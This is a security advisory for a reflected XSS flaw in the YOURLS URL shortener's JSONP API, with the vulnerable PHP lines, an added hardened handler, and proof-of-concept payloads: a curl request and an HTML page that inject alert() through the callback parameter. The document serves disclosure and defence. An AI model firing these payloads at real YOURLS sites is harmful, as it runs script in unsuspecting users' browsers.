GHSA-6mp4-q625-mxjp

Source
https://github.com/advisories/GHSA-6mp4-q625-mxjp
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/12/GHSA-6mp4-q625-mxjp/GHSA-6mp4-q625-mxjp.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-6mp4-q625-mxjp
Published
2025-12-30T19:34:26Z
Modified
2025-12-30T20:06:36.662929Z
Severity
  • 7.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Summary
YOURLS is vulnerable to XSS through JSONP and Callback request parameters
Details

Summary

The callback and jsonp request parameters are concatenated directly into the response body without any sanitization, allowing an attacker to inject arbitrary JavaScript. When YOURLS_PRIVATE is set to false (public API mode), any unauthenticated attacker can exploit this. In private mode, the XSS payload is still reflected into the 403 response body, though the browser does not execute a script resource that is returned with an error status.

Details

Vulnerability exists in the JSONP callback handling chain:

yourls-api.php:127-128

if( isset( $_REQUEST['callback'] ) )
    $return['callback'] = $_REQUEST['callback'];
elseif ( isset( $_REQUEST['jsonp'] ) )
    $return['callback'] = $_REQUEST['jsonp']; 

includes/functions-api.php:127-128

$callback = isset( $output['callback'] ) ? $output['callback'] : '';
$result =  $callback . '(' . json_encode( $output ) . ')';
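For comparison, the following is an added example of a hardened JSONP handler for the pattern shown above. It is not YOURLS code and is not the project's actual fix; the function names, the identifier allow-list regex, the length cap and the "/**/" prefix are assumptions of this example. The idea is that the callback is only ever accepted if it is a plain JavaScript identifier path, and the response is served with a script MIME type so it is never interpreted as HTML.

```php
<?php
// Added example, not YOURLS code. Names and the allow-list are assumptions.

/**
 * Return the callback only if it is a dotted JavaScript identifier path
 * such as "cb", "jQuery123" or "app.handlers.cb"; otherwise return null.
 * Parentheses, quotes, "//", newlines and similar are all rejected, so the
 * caller can never break out of the "callback(" prefix into arbitrary code.
 */
function safe_jsonp_callback(?string $callback): ?string {
    if ($callback === null || $callback === '') {
        return null;
    }
    // Assumed cap: real callbacks are short, and it bounds the reflected text.
    if (strlen($callback) > 64) {
        return null;
    }
    $identifier = '[A-Za-z_$][A-Za-z0-9_$]*';
    return preg_match('/^' . $identifier . '(\.' . $identifier . ')*$/', $callback)
        ? $callback
        : null;
}

/**
 * Build the response body. A rejected callback degrades the response to
 * plain JSON instead of echoing attacker-controlled text. The JSON_HEX_*
 * flags keep "<", ">", "&" and quotes out of the literal so that a client
 * which sniffs the body as HTML still finds nothing executable.
 */
function render_jsonp(array $output, ?string $callback): string {
    $json = json_encode(
        $output,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    $cb = safe_jsonp_callback($callback);
    if ($cb === null) {
        return $json;
    }
    // The leading "/**/" makes the body start with a comment rather than with
    // caller-chosen bytes (a known mitigation for content-type confusion),
    // and the trailing ";" terminates the statement.
    return '/**/' . $cb . '(' . $json . ');';
}

/**
 * Emit the body as JavaScript with nosniff, so the browser never treats the
 * response as an HTML document even if the callback were somehow malformed.
 */
function send_jsonp(array $output, ?string $callback): void {
    header('Content-Type: application/javascript; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo render_jsonp($output, $callback);
}

// Constructed inputs: the advisory's PoC payload and a benign callback.
$output = ['version' => '1.10.2'];
echo render_jsonp($output, 'alert(document.domain)//'), PHP_EOL;
echo render_jsonp($output, 'myCb'), PHP_EOL;
```

With these inputs the first call drops the "alert(document.domain)//" payload and returns only the JSON object, while the second wraps the JSON in "myCb(...)". Rejecting rather than escaping the callback is deliberate: there is no safe escaping for a value that is, by design, emitted as executable code.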

PoC

I. YOURLS instance with YOURLS_PRIVATE set to false in config.php or user authenticated to a private YOURLS instance.

II. Request the version endpoint with a JavaScript payload as the callback:

curl "http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert(document.domain)//"

Expected response:

alert(document.domain)//({"version":"1.10.2","callback":"alert(document.domain)\/\/"})

The trailing "//" turns the remainder of the line, including the "(...)" wrapper, into a comment, so the body is valid JavaScript that executes the injected call when loaded as a script.

Browser PoC file:

<!DOCTYPE html>
<html>
<head><title>pwn</title></head>
<body>
<h1>pwn</h1>
<script src="http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert('pwn');//"></script>
</body>
</html>

Impact

Public mode (YOURLS_PRIVATE=false): full exploitation; any unauthenticated user can trigger the XSS.

Private mode (YOURLS_PRIVATE=true): the XSS payload is reflected into the 403 response body, but the browser does not execute it. However, authenticated users or admins who open malicious links are still vulnerable.

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-79"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-30T19:34:26Z"
}
References

Affected packages

Packagist / yourls/yourls

Package

Name
yourls/yourls
Purl
pkg:composer/yourls/yourls

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Last affected
1.10.2

Affected versions

1.*

1.7.1
1.7.2
1.7.3
1.7.4
1.7.5
1.7.6
1.7.9
1.8
1.8.1
1.8.2
1.9
1.9.1
1.9.2
1.10.0
1.10.1
1.10.2